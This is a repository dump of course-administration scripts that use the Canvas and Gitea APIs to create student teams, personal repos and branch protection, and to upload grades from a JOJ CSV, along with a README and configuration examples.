"alpha_fraction": 0.6364567279815674, "alphanum_fraction": 0.6395289301872253, "avg_line_length": 29.984127044677734, "blob_id": "a0958c22c0a8c314c6f780170aeef099938961f5", "content_id": "e49bd370170ae5b6d445d57b538681b16a829ce9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1953, "license_type": "permissive", "max_line_length": 163, "num_lines": 63, "path": "/src/courses/initTeams.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "import { 
addUserToTeamBySJTUID, createTeam, formatTeamName } from '../teams';\nimport { canvasInstance } from '../axios';\nimport { courseID } from './courses';\nimport { logger } from '../logger';\nimport { createTeamRepo } from '../teams/createTeamRepo';\n\n/**\n *\n * @param organization\n * @param groupSet\n * @returns {String[]} a list of student that has not been added to team\n */\nexport const initTeams = async (courseName, organization, groupSet) => {\n const failList = [];\n let courseGroupList = [];\n let pageCount = 1;\n while (1) {\n let onePageGroupList = (await canvasInstance.get(\n `/courses/${courseID[courseName]}/groups`, {\n params: {\n page: pageCount,\n },\n })).data;\n if (onePageGroupList.length === 0) {\n break;\n }\n courseGroupList = [...courseGroupList, ...onePageGroupList];\n pageCount = pageCount + 1;\n }\n\n const groupList = courseGroupList.filter(\n group => {\n let splitName = group.name.split(' ');\n return splitName[0] === groupSet;\n });\n for (const group of groupList) {\n // get a formatted team name from canvas group\n const groupNum = parseInt(group.name.substr(-2));\n if (isNaN(groupNum)) {\n logger.error(\n `Invalid format for group name ${group.name}. I suppose that the last two should be numbers. I will skip this team. Please init it on Gitea by yourself.`);\n continue;\n }\n\n // create team\n const teamName = formatTeamName(groupSet, groupNum);\n await createTeam(organization, teamName, {});\n await createTeamRepo(organization, teamName);\n\n // add team member\n const groupID = group.id;\n const memberList = (await canvasInstance.get(\n `/groups/${groupID}/users`)).data;\n for (const student of memberList) {\n const failInfo = await addUserToTeamBySJTUID(student, organization,\n teamName);\n if (failInfo) {\n failList.push(failInfo);\n }\n }\n }\n return failList;\n};\n\n" }, { "alpha_fraction": 0.6369426846504211, "alphanum_fraction": 0.6382165551185608, "avg_line_length": 31.70833396911621, "blob_id": "f0089eb92d9863cfbb8666b5b2f8d8035eb2e27b", "content_id": "24dafa1241b9a44c5a778e55429a2c219dc294d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 785, "license_type": "permissive", "max_line_length": 47, "num_lines": 24, "path": "/src/settings/branchProtection.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "export const teamRepoMasterProtection = () => {\n return {\n 'branch_name': 'master',\n 'enable_push': true,\n 'enable_push_whitelist': true,\n 'push_whitelist_usernames': [],\n 'push_whitelist_teams': ['owners'],\n 'push_whitelist_deploy_keys': false,\n 'enable_merge_whitelist': false,\n 'merge_whitelist_usernames': [],\n 'merge_whitelist_teams': [],\n 'enable_status_check': false,\n 'status_check_contexts': null,\n 'required_approvals': 1,\n 'enable_approvals_whitelist': false,\n 'approvals_whitelist_username': [],\n 'approvals_whitelist_teams': [],\n 'block_on_rejected_reviews': false,\n 'block_on_outdated_branch': false,\n 'dismiss_stale_approvals': false,\n 'require_signed_commits': false,\n 'protected_file_patterns': '',\n };\n};\n" }, { "alpha_fraction": 0.7217391133308411, "alphanum_fraction": 0.760869562625885, "avg_line_length": 31.85714340209961, "blob_id": "fa69090bc3a8141509b36cfaf95548b638a691d2", "content_id": "754384ddaf12537f165b4b52388bb57705fc77ab", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 230, "license_type": "permissive", "max_line_length": 54, 
"num_lines": 7, "path": "/example/.env.example", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "GITEA_BASE_URL=https://focs.ji.sjtu.edu.cn/git/api/v1/\nGITEA_TOKEN=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\nCANVAS_BASE_URL=https://umjicanvas.com/api/v1/\nCANVAS_TOKEN=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\nCONNECTION=local11\nLOCAL_GITEA_URL=http://localhost:3000/api/v1/\nLOCAL_GITEA_TOKEN=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n" }, { "alpha_fraction": 0.527308464050293, "alphanum_fraction": 0.532023549079895, "avg_line_length": 32.93333435058594, "blob_id": "b08103e868c643f4319860ca98805c8f5b503628", "content_id": "07dc779e9aa2e6b421b3cf32a0a775b0880416a1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2545, "license_type": "permissive", "max_line_length": 103, "num_lines": 75, "path": "/CreatePersonalRepo/CreatePersonalRepo.py", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "import requests\nimport json\nimport os\nimport re\nimport sys\n\ndotenv_path = '.env'\n\n\ndef import_env():\n with open(dotenv_path) as dotenv:\n for line in dotenv:\n var = line.strip().split('=')\n if len(var) == 2:\n key, value = var[0].strip(), var[1].strip()\n os.environ[key] = value\n\n\ncourse_name = sys.argv[1]\norganization_name = sys.argv[2]\ncourse_id_json_path = 'courses.json'\n\nif __name__ == \"__main__\":\n import_env()\n\n canvas_base_url = os.environ['CANVAS_BASE_URL']\n gitea_base_url = os.environ['GITEA_BASE_URL']\n canvas_token = os.environ['CANVAS_TOKEN']\n gitea_token = os.environ['GITEA_TOKEN']\n with open(course_id_json_path) as json_file:\n course_id_dict = json.load(json_file)\n course_id = course_id_dict[course_name]\n\n url = canvas_base_url + '/courses/{}/students'.format(course_id)\n r = requests.get(url,\n params={'access_token': canvas_token})\n\n student_list = json.loads(r.text)\n\n for student in student_list:\n student_sjtu_id = student['login_id']\n student_name = student['name']\n\n url = gitea_base_url + '/users/search'\n r = requests.get(url, params={\n 'access_token': gitea_token,\n 'q': student_sjtu_id,\n })\n\n user_list = json.loads(r.text)['data']\n if len(user_list) == 0:\n print('{} has not registered yet'.format(student_name))\n continue\n\n username = user_list[0]['username']\n\n repo_name = re.sub(r'[(\\u4e00-\\u9fa5), ]', '', student_name) + str(student_sjtu_id)\n\n # Create personal repo\n r = requests.post(url, {\n \"auto_init\": True,\n \"description\": \"Personal repo for {} in {}\".format(student_name, organization_name),\n \"name\": repo_name,\n \"private\": True,\n }, params={'access_token': gitea_token})\n\n url = gitea_base_url + \\\n '/repos/{}/{}/collaborators/{}'.format(organization_name, repo_name, username)\n r = requests.put(url, {'permission': 'write'}, params={\n 'access_token': gitea_token})\n\n # delete here\n # url = gitea_base_url + '/orgs/{}/repos'.format(organization_name)\n # r = requests.delete(gitea_base_url + '/repos/{}/{}'.format(organization_name, repo_name),\n # params={'access_token': gitea_token})\n" }, { "alpha_fraction": 0.6178243160247803, "alphanum_fraction": 0.6219473481178284, "avg_line_length": 35.66279220581055, "blob_id": "3aff9a37de606e3f154ab2344b8f232b7ec13916", "content_id": "3ee7cfe946c613224641af1e316bf1f14035aad1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3153, "license_type": "permissive", 
"max_line_length": 106, "num_lines": 86, "path": "/GradeFromJOJ/GradeFromJOJ.py", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "\"\"\"\nCanvas fast grading script\nby makersmelx <[email protected]>\n\"\"\"\n\nimport utils\nimport os\nimport csv\nfrom datetime import timedelta\nfrom canvasapi import Canvas\nimport sys\nimport settings\n\ncanvas_full_score = sys.argv[4]\njoj_full_score = sys.argv[5]\ncli_weight = float(canvas_full_score)/float(joj_full_score)\n\n\ndef joj_score_to_canvas_score(_student):\n print('==============================')\n print(\"{}\\t{}\".format(\n _student[settings.csv_name_column], _student[settings.csv_sjtu_id_column]))\n _score = 0\n if len(settings.csv_score_column) != len(settings.weight):\n print(\"Make sure that you can add a weight to all the columns you would like to include\")\n exit(1)\n if len(sys.argv) == 6:\n # if set canvas and joj full score in cli args, then simply use the full score on JOJ to calculate\n settings.weight = [cli_weight]\n for i in range(len(settings.csv_score_column)):\n _column_grade = _student[settings.csv_score_column[i]]\n # todo: complete non number detection\n if _column_grade == '-':\n _column_grade = 0\n _score += float(_column_grade) * settings.weight[i]\n\n # adjustment\n if _student[settings.csv_sjtu_id_column] in settings.extra_adjust:\n _adjust = settings.extra_adjust[_student[settings.csv_sjtu_id_column]]\n _score += _adjust\n print(\"Extra adjust: {}\".format(_adjust))\n\n print('Now score: {}'.format(_score))\n\n if _student[settings.csv_sjtu_id_column] in settings.direct_reassign:\n _reassign = settings.direct_reassign[_student[settings.csv_sjtu_id_column]]\n _score = _reassign\n print('Score is directly re-assigned to: {}'.format(_reassign))\n print('==============================')\n return _score\n\n\nif __name__ == '__main__':\n utils.import_env()\n canvas_base_url = os.environ['CANVAS_BASE_URL']\n canvas_token = os.environ['CANVAS_TOKEN']\n umji_canvas = Canvas('https://umjicanvas.com', canvas_token)\n course = umji_canvas.get_course(sys.argv[2])\n assignment = course.get_assignment(sys.argv[3])\n students = {}\n\n for _student in course.get_users(enrollment_type=['student']):\n students[_student.id] = _student.sis_login_id\n\n joj_scores = {}\n csv_path = sys.argv[1] if sys.argv[1] else settings.csv_path\n with open(csv_path) as joj_csv:\n joj_score = csv.reader(joj_csv)\n skip_line = 0\n for student_row in joj_score:\n if skip_line < settings.content_row:\n skip_line += 1\n continue\n score = joj_score_to_canvas_score(student_row)\n student_id = student_row[settings.csv_sjtu_id_column]\n joj_scores[student_id] = score\n\n all_submissions = assignment.get_submissions()\n\n for _submission in all_submissions:\n if _submission.user_id in students:\n this_student_sjtu_id = students[_submission.user_id]\n this_joj_score = joj_scores.get(this_student_sjtu_id, 0)\n print('SJTU ID:{}, Score:{}'.format(\n this_student_sjtu_id, this_joj_score))\n _submission.edit(submission={'posted_grade': this_joj_score})\n" }, { "alpha_fraction": 0.6766085624694824, "alphanum_fraction": 0.7161527872085571, "avg_line_length": 27.97087287902832, "blob_id": "0ca402fe77f71f478f23927953f250fdaf9f243d", "content_id": "12d8acb2ff1618806ffda65f17017c42809f1c48", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2984, "license_type": "permissive", "max_line_length": 118, "num_lines": 103, "path": "/GradeFromJOJ/settings.py", "repo_name": 
"makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "\"\"\"\nCanvas fast grading script\nby makersmelx <[email protected]>\n\"\"\"\n\nfrom datetime import datetime\n\n\"\"\"\nGet them on Canvas (look at the url of the assignment, you will know the id)\n\"\"\"\n# REQUIRED FIELDS\ncourse_id = 0\n\n# REQUIRED FIELDS\nassignment_id = 0\n\"\"\"\nGet them on Canvas (look at the url of the assignment, you will know the id)\n\"\"\"\n\n\"\"\"\nCSV path. Ignore this if you have type the file path in program arguments\nNotice: all the column starts from 0\n\"\"\"\n# notice the csv should be exported from joj notice that this python script will be started in the root directory,\n# write the path of the csv file according to GiteaCanvasHelper root directory\n# REQUIRED\ncsv_path = ''\n\n\"\"\"\nthe row that records the first student's scores\nStart from 0, usually no need to change\nREQUIRED\n\"\"\"\ncontent_row = 1\n\"\"\"\nthe column that records student name\nStart from 0, usually no need to change and no use\nREQUIRED\n\"\"\"\ncsv_name_column = 1\n\n\"\"\"\nthe column that records SJTU id\nStart from 0, usually no need to change\nREQUIRED\n\"\"\"\ncsv_sjtu_id_column = 2\n\n\"\"\"\nwrite all the column index (of the csv, start from 0) of the score that you would like to include\nremember that for each column index please give them a weight in the second list\n\"\"\"\n# example: csv_score_column = [7, 8], weight = [0.1, 0.2], suppose that all data in one row is a list called row.\n# Grade for this student is ``row[7] * 0.1 + row[8] * 0.2``\ncsv_score_column = [3]\nweight = [float(100/270)]\n\n\"\"\"\nadjust to canvas score\n\"\"\"\n# This adjust is applied after calculating Canvas score from csv and before bonus/deduction\n# Modify the example below, the value should be the Canvas score\nextra_adjust = {\n \"517370910xxx\": 10,\n \"517370910xxy\": -10\n}\n\n# direct reassign point on Canvas to a student, will do this after all the add-weight calculation, bonus and deduction\ndirect_reassign = {\n \"517370910xxx\": 100,\n \"517370910xxy\": 0\n}\n\n\n\"\"\"\nBelow are some features that are nonsense now\n\"\"\"\n# \"\"\"\n# How to decide the final submission time? 
Suppose you will define the time of the latest submission of three\n# problems as the final submission time of this assignment, write down the column of the used time (in seconds) of\n# three problems here\n# \"\"\"\n# # Usually no need to fill this field if you are using from JOJ\n# csv_last_submission_timestamp_column = []\n\n# \"\"\"\n# Date settings\n# \"\"\"\n# # Usually no need to fill these field if you are using from JOJ\n#\n# start_date = datetime(2020, 9, 25)\n#\n# due_date = datetime(2020, 10, 11, 23, 59, 59)\n# # late deduction is multiplied to the full point of this assignment rather than the current score rather than,\n# # and then deducted from the current score\n# # late_deduction = [0.1, 0.1, 0.1] means 10% deduction per day, and 0 pt for more than three days\n# late_deduction = []\n#\n# # Bonus settings\n# has_bonus = False\n# bonus_date = datetime(2020, 10, 4, 23, 59, 59)\n# # bonus portion is multiplied to the current score rather than the full point of this assignment\n# bonus_portion = 0.1\n" }, { "alpha_fraction": 0.7166666388511658, "alphanum_fraction": 0.7166666388511658, "avg_line_length": 27.799999237060547, "blob_id": "f0c585d86311612039aa72093174fad64b915bd4", "content_id": "1be572d9f270d36117a2cfedf93bc39714fe052e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 720, "license_type": "permissive", "max_line_length": 78, "num_lines": 25, "path": "/src/axios/gitea.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "import axios from 'axios';\nimport dotenv from 'dotenv';\n\ndotenv.config();\nconst readlineSync = require('readline-sync');\nconst giteaToken = process.env.GITEA_TOKEN ||\n readlineSync.question('Type in your gitea token:\\n');\nconst local = process.env.CONNECTION ?\n process.env.CONNECTION.toLowerCase() === 'local' :\n false;\nconst remoteGiteaInstance = axios.create({\n baseURL: process.env.GITEA_BASE_URL,\n headers: {\n 'Authorization': `token ${giteaToken}`,\n },\n});\n\nconst localGiteaInstance = axios.create({\n baseURL: process.env.LOCAL_GITEA_URL,\n headers: {\n 'Authorization': `token ${process.env.LOCAL_GITEA_TOKEN}`,\n },\n});\n\nexport const giteaInstance = local ? 
localGiteaInstance : remoteGiteaInstance;\n" }, { "alpha_fraction": 0.591549277305603, "alphanum_fraction": 0.591549277305603, "avg_line_length": 28.789474487304688, "blob_id": "cdc5450f1d06c91b0aed05fe53acec409c10e598", "content_id": "30644fd37babc942582ee903560532c67af5cf58", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 568, "license_type": "permissive", "max_line_length": 75, "num_lines": 19, "path": "/src/settings/team.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "export const projectTeamConfig = (teamName, config = {}) => {\n return {\n 'description': config.description || teamName,\n 'includes_all_repositories': config.includes_all_repositories || false,\n 'can_create_org_repo': config.can_create_org_repo || false,\n 'name': config.name || teamName,\n 'permission': config.permission || 'write',\n 'units': config.units || [\n 'repo.code',\n 'repo.issues',\n 'repo.ext_issues',\n 'repo.wiki',\n 'repo.pulls',\n 'repo.releases',\n 'repo.projects',\n 'repo.ext_wiki'\n ]\n };\n};\n\n\n" }, { "alpha_fraction": 0.6808510422706604, "alphanum_fraction": 0.6808510422706604, "avg_line_length": 30.33333396911621, "blob_id": "feaa8b124423684202615102f44732508bf909d4", "content_id": "fca36c339c02076bef2a523729090b362be7307c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 94, "license_type": "permissive", "max_line_length": 37, "num_lines": 3, "path": "/src/courses/index.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "export * from './initTeams';\nexport * from './courses';\nexport * from './createEveryoneTeam';\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 29, "blob_id": "61af8c24a36fac35a64f8119ec75148768851ab6", "content_id": "9a8a8763921c4927698e05fed0e8a3a837642abe", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 60, "license_type": "permissive", "max_line_length": 35, "num_lines": 2, "path": "/src/settings/index.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "export * from './branchProtection';\nexport * from './team';\n" }, { "alpha_fraction": 0.6907216310501099, "alphanum_fraction": 0.6907216310501099, "avg_line_length": 31.33333396911621, "blob_id": "c3900cfc696d066b160973a5904b1e2e84df89b7", "content_id": "6650f9b6b48b1cadddcb1b2464428b90f72df4cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 97, "license_type": "permissive", "max_line_length": 33, "num_lines": 3, "path": "/src/teams/index.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "export * from './addUserToTeam';\nexport * from './createTeam';\nexport * from './formatTeamName';\n" }, { "alpha_fraction": 0.5928251147270203, "alphanum_fraction": 0.6017937064170837, "avg_line_length": 25.235294342041016, "blob_id": "8095d9705eb852d6d93cb3795d7a812a69c3d91e", "content_id": "aac603e01b5222656a26058937fbb85622e454cd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2230, "license_type": "permissive", "max_line_length": 79, "num_lines": 85, "path": "/src/teams/createTeamRepo.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "import { giteaInstance } from 
'../axios';\nimport { teamRepoMasterProtection } from '../settings';\nimport { logger } from '../logger';\n\n/**\n *\n * @param organization\n * @param teamName\n * @returns {Promise<void>}\n */\nexport const createTeamRepo = async (organization, teamName) => {\n const repoName = teamName;\n\n //create repo\n const ret = await giteaInstance.post(`/orgs/${organization}/repos`, {\n 'auto_init': true,\n 'description': 'string',\n 'name': `${teamName}`,\n 'private': true,\n }).then(response => {\n switch (response.status) {\n case 409:\n logger.info(`${organization}/${repoName} already exists.`);\n return Promise.resolve(-1);\n case 422:\n logger.error(`Creating ${organization}/${repoName} fails.`);\n return Promise.resolve(-1);\n case 201:\n return Promise.resolve(1);\n default:\n return Promise.resolve(-1);\n }\n }, error => {\n return Promise.resolve(-1);\n });\n\n // if (ret === -1) {\n // return;\n // }\n\n //grant access to team\n let response = (await giteaInstance.get(`/orgs/${organization}/teams/search`,\n {\n params: {\n q: teamName,\n },\n }));\n const queryList = response.data.data;\n if (queryList.length === 0) {\n logger.error(`Team ${teamName} does not exist.`);\n return;\n }\n const teamID = queryList[0].id;\n\n await giteaInstance.put(\n `/teams/${teamID}/repos/${organization}/${repoName}`).then(response => {\n switch (response.status) {\n case 403:\n logger.error(`Grant access of ${teamName} to repo ${repoName} fails.`);\n break;\n default:\n break;\n }\n }, error => {\n logger.error(error.response);\n });\n\n // add branch protection\n await giteaInstance.post(\n `/repos/${organization}/${repoName}/branch_protections`,\n teamRepoMasterProtection(),\n ).then((response) => {\n logger.info('Add branch protection');\n }, (error) => {\n logger.error(error.response.data);\n });\n await giteaInstance.patch(\n `/repos/${organization}/${repoName}/branch_protections/master`,\n teamRepoMasterProtection(),\n ).then((response) => {\n logger.info('Update branch protection');\n }, (error) => {\n logger.error(error.response.data);\n });\n};\n" }, { "alpha_fraction": 0.6078431606292725, "alphanum_fraction": 0.6078431606292725, "avg_line_length": 24.5, "blob_id": "55d8f9b2aa459f21e335f03a1fb928cf5786b988", "content_id": "7eef608ebf228f7dd40e938b5e22b6e33322a33c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 51, "license_type": "permissive", "max_line_length": 25, "num_lines": 2, "path": "/src/axios/index.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "export * from './gitea';\nexport * from './canvas';\n" }, { "alpha_fraction": 0.7454800605773926, "alphanum_fraction": 0.7528523802757263, "avg_line_length": 31.741378784179688, "blob_id": "4926b7a5e773f78672ee1eb864c25e13746e0ed7", "content_id": "43b8c5d8f6e218ed215eba4874ce432b7468adba", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5697, "license_type": "permissive", "max_line_length": 229, "num_lines": 174, "path": "/README.md", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "# Gitea and Canvas helper\nThis repo contains scripts that\n- Upload students grade on Canvas based on their scores on JOJ\n- Set students ready on Gitea based on their Canvas information\n\n## Available Usage\n### Python part\n\n- [Create a personal repo for everyone in an organization](#CreatePersonalRepo)\n- [Grade Canvas from JOJ exported 
CSV](#GradeFromJOJ)\n\n### Node.js part\n- [Create a team in the organization which has all students of this course on the Canvas page as its members.\n](#createEveryoneTeam) while its loop version is [Loop version](#createEveryoneTeamLoop).\n- [According to the groups in a group set on Canvas, create corresponding teams on Gitea and add students to those teams\n](#initTeam)\n\n## Before use\n\n1. Install Node.js on your system\n2. Go to the root directory and run\n~~~\nnpm install\n~~~\n\n## .env Setting\n\n~~~shell\nGITEA_BASE_URL=https://focs.ji.sjtu.edu.cn/git/api/v1/\nCANVAS_BASE_URL=https://umjicanvas.com/api/v1/\nGITEA_TOKEN=\nCANVAS_TOKEN=\n# for local Gitea instance (not essential, can run without them)\nCONNECTION=local\nLOCAL_GITEA_URL=http://localhost:3000/api/v1/\nLOCAL_GITEA_TOKEN=\n~~~\nExample is at example/.env.example. Make a copy of it to the root dir. Rename it to .env\n\nIf you have not set the environment variables, you will be asked to input the missing variables through the CLI at the start of the program.\n\n(Only for testing a local Gitea instance, otherwise please ignore): if you would like to test your local Gitea instance, define CONNECTION and set it to 'local', so that the program will connect to the local server (see axios/gitea.js)\n\n## Course Setting (Before running)\n\nSee `example/courses.json.example`. Make a copy of it to the root dir. Rename it to `courses.json`\n\n**Please update the course name, or the id of the course on Canvas.**\n\nFor the usage below, when you need to type in a course name, please **use the course name rather than the actual id here**\n\n## Org and Team in Gitea\nIn Gitea, you cannot add a user to an organization directly. Instead, you should invite the user to at least one team in this organization, to add the user to the organization.\n\n## Node.js part\nRun `npm install` before everything (skip it for Python usage)\nBasic usage will always look like:\n~~~\nnpm start <usage> arg1 arg2 ...\n~~~\n\n\n\n\n### initTeam\n\nAccording to the groups in a group set on Canvas, create corresponding teams on Gitea and add students to those teams\n\n**Notice: when the group set name is `pgroup2`, this function will go through all the groups from all the group sets with name `pgroup2 {id}` rather than all the groups in the group set `pgroup2` on Canvas**\n\n**Warning: If a student is not added to a group in this group set on Canvas, for coding convenience, I will do nothing about this student here. Please check him manually.**\n\n\n~~~\nnpm start i <course name> <Gitea org name> <groupset name>\n~~~\n\nlike\n\n~~~\nnpm start i ve482 ve482-org pgroup2\n~~~\n\n\n\n### CreateEveryoneTeam\n\nCreate a team in the organization which has all students of this course on the Canvas page as its members.\n\nNotice that this function will only add students who have registered on Gitea. If they are to be taught how to register in the lab, you can try the loop version so that it can run by itself.\n~~~\nnpm start s <course name> <Gitea org name> <team name>\n~~~\n\nlike\n\n~~~\nnpm start s ve482 ve482-org Students\n~~~\n\n\n### CreateEveryoneTeamLoop (under maintenance)\n\nLoop version of CreateEveryoneTeam. Create a team in the organization which has all students of this course on the Canvas page as its members. 
Repeat this every <interval> ms.\n\n~~~\nnpm start labLoop <course name> <team name> <interval>\n~~~\n\nlike\n\n~~~\nnpm start labLoop ve482 Students 30000\n~~~\n\n\n### To loop in the lab (to be fixed)\nIn a loop, it will run createEveryoneTeam and create a personal repo for everyone in an organization.\n\nI don't know what I am writing now......\n\n`It will be fixed if I remember this and that time I am bored.`\n~~~shell\n./loop.sh\n~~~\n\n\n## Python Part\n### CreatePersonalRepo\nCreate a personal repo for everyone in an organization.\n\nNotice that it only works when the working dir is this `GiteaCanvasHelper` root directory.\n\nOn Gitea, every student will have his own personal repository with name `${his_name}${sjtu_id}`\n\nThis Python program shares the same environment variables with Node.js via .env\n\nMake sure the first arg is in `courses.json`\n~~~shell\npython CreatePersonalRepo/CreatePersonalRepo.py [course name] [organization name]\n~~~\n\n### GradeFromJOJ\n**!!!: This feature has been moved to a separate repo now at [auto-csv-grader](https://github.com/makersmelx/canvas-csv-autograder). It is not going to be updated here anymore**\n \n \nGrade Canvas from JOJ exported CSV.\n\nSee `GradeFromJOJ` folder\n\nNotice that it only works when the working dir is this `GiteaCanvasHelper` root directory.\n\nIt is used to upload grades on Canvas based on JOJ 1.0 scores.\n\n1. Set `CANVAS_TOKEN` at .env in `GiteaCanvasHelper` root directory\n2. <del>Modify all the settings in `settings.py`</del>\n3. You must set a default grade for this assignment for each student before running this script\n\nYou can also use this script to upload scores on Canvas based on your own csv file (you should include students' sjtu id, or your csv should have the same first three columns as the JOJ 1.0 csv format)\n\n~~~shell script\npython GradeFromJOJ/GradeFromJOJ.py [csv_path] [course_id] [assignment_id] [canvas_full_score] [joj_full_score]\n~~~\n\ncsv_path: path of the JOJ exported grade csv file\n\ncourse_id: appears in the Canvas course page url; id of the course\n\nassignment_id: appears in the Canvas assignment page url; id of the assignment\n\ncanvas_full_score: full score of this assignment on Canvas\n\njoj_full_score: full score of this assignment on JOJ\n" }, { "alpha_fraction": 0.5142857432365417, "alphanum_fraction": 0.522857129573822, "avg_line_length": 19.58823585510254, "blob_id": "567873c42673890d5c944e10f12754b439fbe16c", "content_id": "f23057a09466d349b3a7d0a7a4009277442d1ab7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 350, "license_type": "permissive", "max_line_length": 59, "num_lines": 17, "path": "/GradeFromJOJ/utils.py", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "\"\"\"\nCanvas fast grading script\nby makersmelx <[email protected]>\n\"\"\"\n\nimport os\n\ndotenv_path = '.env'\n\n\ndef import_env():\n    with open(dotenv_path) as dotenv:\n        for line in dotenv:\n            var = line.strip().split('=')\n            if len(var) == 2:\n                key, value = var[0].strip(), var[1].strip()\n                os.environ[key] = value\n" }, { "alpha_fraction": 0.7021870613098145, "alphanum_fraction": 0.7068403959274292, "avg_line_length": 41.939998626708984, "blob_id": "233d1e8709ad77616e8b6b9c4585cd3dfbb6d103", "content_id": "2c6144c81b123b8b37bdaaa8c4d1a6dc8dc2a5c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2149, "license_type": "permissive", "max_line_length": 172, 
"num_lines": 50, "path": "/src/index.js", "repo_name": "makersmelx/GiteaCanvasHelper", "src_encoding": "UTF-8", "text": "import { createEveryoneTeam, initTeams, } from './courses';\nimport { logger } from './logger';\n\nconst readlineSync = require('readline-sync');\n\nconst callInitTeams = async (courseName, organization, groupSetName) => {\n const failList = await initTeams(\n courseName.toLowerCase(), organization, groupSetName\n );\n logger.warn(\n 'If a student are not added into a group in this group set on Canvas, for coding convenience, I will do nothing about this student here. Please check him manually.\\n');\n logger.info(\n 'Notice that the below students are not adding to a expected Gitea Team.\\n');\n logger.info(failList);\n};\n\nconst callCreateStudentTeam = async (courseName, organization, teamName) => {\n const failList = await createEveryoneTeam(\n courseName.toLowerCase(), organization, teamName\n );\n logger.info(\n 'Notice that the below students are not adding to the expected Gitea Student Team.\\n');\n logger.info(failList);\n};\nconst argv = process.argv.slice(3);\nlet organization, groupSetName, teamName, mode, courseName;\nmode = process.argv[2] || readlineSync.question(\n 'Please choose a mode.\\n [s] Create a team that includes all students of this course.\\n [i] Create teams according the group set name on canvas.\\n> ');\nswitch (mode) {\n case 's':\n courseName = argv[0] || readlineSync.question('Type in the course name:\\n');\n organization = argv[1] ||\n readlineSync.question('Type in the organization name:\\n');\n teamName = argv[2] || readlineSync.question(\n 'Type in the overall team name, like Students:\\n');\n callCreateStudentTeam(courseName, organization, teamName);\n break;\n case 'i':\n courseName = argv[0] || readlineSync.question('Type in the course name:\\n');\n organization = argv[1] ||\n readlineSync.question('Type in the organization name:\\n');\n groupSetName = argv[2] || readlineSync.question(\n 'Type in the group set name, like pgroup (if one group is named as pgroup-01):\\n');\n callInitTeams(courseName, organization, groupSetName);\n break;\n case 'h':\n default:\n console.log('Unrecognized arguments. For usage guidance, see README.md');\n break;\n}\n\n\n" } ]
19
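The makersmelx/GiteaCanvasHelper record above revolves around one recurring technique: token-authenticated REST calls against the Gitea and Canvas APIs (CreatePersonalRepo.py passes access_token as a query parameter, while src/axios/gitea.js sends an Authorization header). Below is a minimal runnable sketch of that request pattern, not part of the record itself; it assumes GITEA_BASE_URL and GITEA_TOKEN are exported as in the .env example, and the SJTU id in the query is a placeholder, not data from the record.

~~~python
# Minimal sketch of the token-authenticated Gitea API pattern used by
# CreatePersonalRepo.py. GITEA_BASE_URL and GITEA_TOKEN are assumed to be
# set in the environment; "517370910xxx" is a placeholder SJTU id.
import os

import requests

gitea_base_url = os.environ["GITEA_BASE_URL"]
gitea_token = os.environ["GITEA_TOKEN"]

# Search for a Gitea user; the token travels as a query parameter,
# exactly as in the scripts above.
r = requests.get(
    gitea_base_url + "/users/search",
    params={"access_token": gitea_token, "q": "517370910xxx"},
)
r.raise_for_status()
users = r.json()["data"]  # Gitea wraps search results in a "data" list
if not users:
    print("user has not registered yet")
else:
    print("found username:", users[0]["username"])
~~~

The same pattern, with requests.post and requests.put, is what the script uses to create each personal repo and grant the student write access.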
djarecka/datalad
https://github.com/djarecka/datalad
92ca5619b957e0cc2fe7021c0f0542127eee4e8d
2f8ec83b44108d3b022c778a99d648105028f202
